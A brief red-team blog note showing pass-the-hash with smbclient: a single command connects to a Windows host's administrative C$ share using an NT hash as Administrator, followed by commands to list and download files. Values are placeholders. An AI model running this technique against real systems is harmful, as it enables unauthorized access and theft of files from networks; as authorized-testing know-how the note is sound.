[NOTE] #RedTeam Use Hash to get access #smbclient

Krishnendu Paul

Jul 27, 2021 1 min read

You do have access to a hash but can't crack the password ? Want to find if they have juicy info in a share? Pass the Hash without the actual password with smbclient.

smbclient '//PC.example.local/C$' -U Administrator --pw-nt-hash blahblahblah -W example.local

ls - lists files

cd  - directories

mget - download file(s)

Great! You've successfully subscribed.
Great! Next, complete checkout for full access.
Welcome back! You've successfully signed in.
Success! Your account is fully activated, you now have access to all content.